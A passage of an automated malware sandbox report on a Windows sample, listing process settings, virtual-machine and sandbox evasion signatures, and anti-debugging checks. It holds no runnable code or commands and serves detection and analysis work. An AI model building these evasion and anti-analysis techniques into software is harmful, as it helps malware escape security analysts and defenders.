Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F324.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\dialer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\dialer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\dialer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\dialer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5720, type: MEMORYSTR
Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\AppData\Roaming\gfiecjd Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\gfiecjd Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\gfiecjd Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\gfiecjd Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\gfiecjd Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\gfiecjd Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Memory allocated: 1FF71250000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Memory allocated: 1FF72D00000 memory reserve | memory write watch Jump to behavior
Contains functionality to detect virtual machines (STR)
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488BEAC1C str word ptr [eax-75h] 13_3_00007DF488BEAC1C
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Thread delayed: delay time: 180000
Source: C:\Windows\SysWOW64\explorer.exe Thread delayed: delay time: 600000
Source: C:\Windows\SysWOW64\explorer.exe Thread delayed: delay time: 600000
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2180 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1689 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4485 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5279 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7381
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2423
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 419
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 483
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 855
Source: C:\Windows\SysWOW64\explorer.exe Window / User API: threadDelayed 363
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\F557.exe API coverage: 3.2 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5968 Thread sleep count: 2180 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5968 Thread sleep count: 1689 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4952 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6524 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1216 Thread sleep count: 4485 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4832 Thread sleep count: 5279 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4816 Thread sleep time: -17524406870024063s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5584 Thread sleep count: 7381 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5584 Thread sleep count: 2423 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2232 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\explorer.exe TID: 5004 Thread sleep count: 419 > 30
Source: C:\Windows\explorer.exe TID: 6092 Thread sleep count: 483 > 30
Source: C:\Windows\explorer.exe TID: 6092 Thread sleep time: -48300s >= -30000s
Source: C:\Windows\explorer.exe TID: 5832 Thread sleep count: 288 > 30
Source: C:\Windows\explorer.exe TID: 6096 Thread sleep count: 216 > 30
Source: C:\Windows\explorer.exe TID: 5540 Thread sleep count: 191 > 30
Source: C:\Windows\explorer.exe TID: 5584 Thread sleep count: 187 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 6476 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe TID: 6352 Thread sleep time: -930000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe TID: 1628 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe TID: 7060 Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe TID: 6352 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 6760 Thread sleep count: 43 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 6760 Thread sleep time: -43000s >= -30000s
Source: C:\Windows\explorer.exe TID: 4296 Thread sleep count: 40 > 30
Source: C:\Windows\explorer.exe TID: 4296 Thread sleep time: -40000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 2232 Thread sleep count: 363 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 2232 Thread sleep time: -217800000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 2232 Thread sleep time: -600000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 5416 Thread sleep count: 33 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 5416 Thread sleep time: -33000s >= -30000s
Source: C:\Windows\explorer.exe TID: 4404 Thread sleep count: 36 > 30
Source: C:\Windows\explorer.exe TID: 4404 Thread sleep time: -36000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 4120 Thread sleep count: 39 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 4120 Thread sleep time: -39000s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\Desktop\xwREqjHUEv.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\Desktop\xwREqjHUEv.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Users\user\Desktop\xwREqjHUEv.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Users\user\Desktop\xwREqjHUEv.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\SysWOW64\dialer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\dialer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\dialer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\dialer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\F557.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Code function: 0_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405C63
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Code function: 0_2_00402910 FindFirstFileW, 0_2_00402910
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Code function: 0_2_004068B4 FindFirstFileW,FindClose, 0_2_004068B4
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_005A14DE FindFirstFileExW, 24_2_005A14DE
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030A2B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose, 25_2_030A2B15
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030A3ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose, 25_2_030A3ED9
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030A1D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose, 25_2_030A1D4A
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C08E20 GetLogicalDriveStringsW, 13_3_00007DF488C08E20
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C67344 GetSystemInfo, 13_3_00007DF488C67344
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Thread delayed: delay time: 30000
Source: C:\Windows\SysWOW64\explorer.exe Thread delayed: delay time: 600000
Source: C:\Windows\SysWOW64\explorer.exe Thread delayed: delay time: 600000
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Adobe Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Adobe\Acrobat Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: powershell.exe, 00000006.00000002.2139498659.0000000008770000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: VMware
Source: powershell.exe, 00000006.00000002.2117709095.0000000005DFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2139498659.0000000008770000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: VBoxTray
Source: xwREqjHUEv.exe, 00000000.00000002.2013926877.000000000063D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: wscript.exe, 00000002.00000002.2018475832.00000000035D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}yJ
Source: dialer.exe, 00000008.00000002.2179502252.0000000003408000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWLevel
Source: dialer.exe, 00000008.00000002.2179356766.0000000003394000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMCIDevSymbol
Source: dialer.exe, 00000008.00000002.2179502252.0000000003408000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000006.00000002.2139498659.0000000008770000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: vmtoolsd
Source: powershell.exe, 00000006.00000002.2139498659.0000000008770000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: VBoxService
Source: wscript.exe, 00000002.00000002.2018475832.00000000035D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\>
Source: C:\Users\user\Desktop\xwREqjHUEv.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\gfiecjd System information queried: ModuleInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\AppData\Roaming\gfiecjd System information queried: CodeIntegrityInformation
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Roaming\gfiecjd Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7102DCA8 LdrLoadDll, 14_2_000001FF7102DCA8
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_0059A4ED IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_2_0059A4ED
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_0058FA0A LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 24_2_0058FA0A
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\dialer.exe Code function: 8_3_032A027F mov eax, dword ptr fs:[00000030h] 8_3_032A027F
Source: C:\Users\user\AppData\Local\Temp\F324.exe Code function: 23_3_00427277 mov eax, dword ptr fs:[00000030h] 23_3_00427277
Source: C:\Users\user\AppData\Local\Temp\F324.exe Code function: 23_2_00427277 mov eax, dword ptr fs:[00000030h] 23_2_00427277
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_0059DC12 mov eax, dword ptr fs:[00000030h] 24_2_0059DC12
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_00599F9B mov eax, dword ptr fs:[00000030h] 24_2_00599F9B
Contains functionality which may be used to detect a debugger (GetProcessHeap)
